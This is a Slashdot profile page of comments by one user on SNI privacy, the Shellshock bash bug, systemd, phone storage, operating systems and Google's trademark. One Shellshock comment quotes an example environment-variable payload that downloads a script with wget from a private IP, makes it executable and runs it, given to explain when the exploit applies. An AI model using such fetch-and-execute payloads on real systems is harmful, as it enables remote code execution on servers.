Forgot your password?
typodupeerror

Comment: Re:Now how about the third party ad networks (Score 1) 66

by squiggleslash (#48026031) Attached to: CloudFlare Announces Free SSL Support For All Customers

Looking at the Wikipedia page, the two EOL'd environments that stand out are:

- Android browser on Gingerbread (and older) - hopefully this'll be solved soon, Gingerbread is finally disappearing but it's taken a while.
- Internet Explorer on Windows XP.

Everything else seems to be the kind of environment where if you're still using a browser that cannot support SNI then you're probably running into all kinds of problems anyway.

(I would like to think that Windows XP users are using Firefox these days, but...)

Question: aren't there privacy issues associated with SNI? http://tools.ietf.org/html/rfc... shows no attempt to munge the server name. So even though a third party might not be able to determine what content you're trying to access, they probably can intercept - albeit with the victim experiencing an interuption in service - the hostname and determine whose content you're trying to view.

Comment: Re:Can someone explain how someone is exploited? (Score 3, Interesting) 326

by squiggleslash (#48019297) Attached to: Bash To Require Further Patching, As More Shellshock Holes Found

Kinda. With "Mark 2" it becomes considerably more difficult, as you have to find a way to set an environment variable to the same name as a command that'll be executed - at least, from the proof of concept exploits I'm seeing. So even if a badly configured webserver sets HTTP_HOST to "() { wget http://192.168.0.1/r00t.sh ; chmod +x r00t.sh; ./r00t.sh; }", unless your script actually tries to run a program called HTTP_HOST it shouldn't be called.

(If I'm wrong, expecting angry flames now ;-) Please though include details of why.)

Comment: Re:Issue with FSF statement... (Score 2) 208

by squiggleslash (#48009263) Attached to: Apple Yet To Push Patch For "Shellshock" Bug

I suspect large numbers of people saw the bug, but didn't realize the implications and took no action knowing that the last thing you want to do with a programming language (which a shell like a bourne implementation implements) is change what constitutes valid code.

What does this mean? Unsure. It's always been bad practice to use system() or similar calls to start other apps. What this issue has revealed is not so much that bash has a bug in it, but that rather too many applications rely upon bash and shouldn't. Bash is always a vector, and writing code that calls it already means working a great deal on input validation exercises that risk failure.

The scary part is that a significant amount of the *ix community doesn't care - they call system() anyway, or blindly allow the shell environment to be modified, without asking themselves whether this is a good idea.

Comment: Re:Full Disclosure can be found on oss-security... (Score 1) 399

by squiggleslash (#48008409) Attached to: Remote Exploit Vulnerability Found In Bash

One thing missing in all of this is how do I exploit it? In the example you give, that's not clear.

So far as I can determine, the only time this is going to be exploited is if you have some way of manipulating the environment of the shell. I can't think of a CGI variable that's directly set to the content of something the caller has enough control over, pretty much all of them are munged, have mandatory punctuation incompatible with use as a function placed at the beginning, or are impossible to put parentheses and punctuation in.

Perhaps I'm wrong. But I'm inclined to think the entire thing is overblown for two reasons. First, the difficulty of setting the environment in the first place, and secondly the fact making system() calls, etc, is always a red flag for those checking for security holes (and is rare and usually unnecessary) because of the other potential issues with calling a program that literally has direct control over a substantial amount of your computer.

Which is not to say that, for example, the DHCP exploit that's been mentioned isn't terrifying, but even that... why the hell does the DHCPD client, by default, allow the environment to be changed via an insecure DHCP environment anyway?

Comment: Re:kill -1 (Score 2) 469

by squiggleslash (#47960039) Attached to: Fork of Systemd Leads To Lightweight Uselessd

Must admit that's news to me. Kinda fed up of the subtle changes to shell commands we've seen over the last few years especially as this one conflicts with the kill -{SIGNAL} syntax we're used to.

Either way, this sounds like a non-issue. (1) if we're routinely trying to determine how to kill EVERY CORE PROCESS ON THE SYSTEM then we have bigger fish to fry than whether init/systemd is capable of working with that.

(2) It sound scriptable to me, assuming systemd itself isn't capable of doing it. /proc should give you all the information you need.

I worry that this is the kind of concern holding back adoption of systemd. Good reasons I understand. Bad ones, that seek to blame systemd for major system problems that exist under init too, are bad.

Comment: Re:Memory doesn't cost that much. (Score 1) 262

by squiggleslash (#47958289) Attached to: Why the iPhone 6 Has the Same Base Memory As the iPhone 5

I agree Google shouldn't have omitted the SD card slot from their Nexus series. It's one of many reasons I'll never buy a Nexus device again.

Nobody here is talking about swapping SD cards constantly. What's being talked about is not caring about the capacity of the device you buy. You store apps on the device as there's more than enough space even when they have tiny amounts of memory like 16GB. You store data on one, single, micro SD card. When you run out of space on your micro SD card, you buy a bigger one and copy your data to that.

That way, upgrading your phone is just a matter of swapping the SIM and SD cards. Your data follows you. It "just works". Rather than the inordinately stupid idea, popularized by Apple and slavishly copied by Google, of copying all your data across from one device to the other, either directly, or via the cloud, all umpteen gigabytes of it. That's ridiculous, that's absurd, and manufacturers should recognize that's a massive inconvenience nobody wants.

Comment: Re:A non-UNIX OS in a UNIX world? (Score 1) 545

by squiggleslash (#47935767) Attached to: What To Expect With Windows 9

I wish Microsoft wasn't the only one.

Part of the reason geeks love *ix is because right now the alternative is Windows, and *ix matured rather better than the odd combination of technologies (an API and application model with its roots in Windows 1.0 coupled with a nice-ish kernel with inspiration from the unholy combination of VMS and the 1980s microkernel movement) that's called Windows today.

Throughout my life I've used a variety of different platforms, though the ability to choose something different dried up in the mid-nineties as one by one the alternatives either went bankrupt or became obsolete. Some - at the time I was using them, not now - felt more comfortable, flexible, and ultimately more usable, than *ix. AmigaOS 2.04+ (especially augmented with the GCC tools) would be an example (again, NOT NOW, THEN.) Others, like VMS, were ugly, and horrendous to use or program, but they were still valuable in terms of providing wonderful ideas that, alas, we've ignored since - VMS itself had generic job queues, indexed files right in the file system, a shell that didn't blindly execute files with the same name a command you'd typed, security passed upon roles and permissions, networking built into the file system (think if you could type "cat header.html scp://otherhost/home/squiggleslash/main.html footer.html > blah.html" - that's roughly what I'm talking about), all unfortunately crippled by some clumsy design decisions and a reliance on proprietary hardware.

*ix is great, but for those who've experienced more than Unix and Windows, it's... well, it's kind of like we settled. You know that couple who knew each other at high school, and then after a 20 year absence got married at 40? And they seem OK, but you realize both are bored, and both married because they felt like they were running out of options?

That's us and *ix.

Comment: Re:Good (Score 1) 323

by squiggleslash (#47925799) Attached to: Say Goodbye To That Unwanted U2 Album

Wait, iPhones autoplay music? As in, not only did Apple push the unwanted album to phones, but they then set up the iPhone to play it at full blast whenever you were nearby, forcing you to listen to it?

If that's the case, then that has been left out of the widespread news coverage of the story, which has just concentrated on the "Being uploaded to phones that were set up to automatically download new purchases", which most of us consider a minor inconvenience, if that.

Comment: Re:Lucky them (Score 1) 159

by squiggleslash (#47925323) Attached to: Court Rules the "Google" Trademark Isn't Generic

The results I get seem to be mostly people trying to come up with clever blog titles, not actually cases where someone innocently said "Well, I googled what you asked for, and Bing gave me over a gajillion results."

Indeed, I suspect there are multiple levels here. If someone tells me to "Go google something", I may use Bing in my quest to research whatever it is I've been asked to look up. OTOH, if I say "Well, I googled it, and found...", it'll generally be the case that I'm saying I actually used Google.

Comment: Re:If there was only one viable choice ... (Score 1) 159

by squiggleslash (#47925305) Attached to: Court Rules the "Google" Trademark Isn't Generic

Pro-tip, which I learned recently: Google has actually a hidden (well, obscure, it's there but there's no reason you'd think it does what it does) option that means "Just give me the results using the algorithms you used back when Google was useful." Search Tools -> (All Results) : Verbatim.

No, you can't make it a default. They track that you're probably male, probably interested in tech, and that you'd be a good person to present ads for spiked leather underpants to, but they don't track that you actually want useful search engine results. Sigh.

Comment: Re:Well, if you're going to push... (Score 1) 159

by squiggleslash (#47925247) Attached to: Court Rules the "Google" Trademark Isn't Generic

I'm in my forties, and I don't recall anyone ever using the term "Xerox". I've heard it used as an example of someone using a trademark generically, but not actually seen that occur in practice.

Same, BTW, goes for Kleenex. Everyone I know, since the dawn of time, has said "tissue".

Coke and Tylenol, yeah. But not Xerox or Kleenex.

Today's scientific question is: What in the world is electricity? And where does it go after it leaves the toaster? -- Dave Barry, "What is Electricity?"

Working...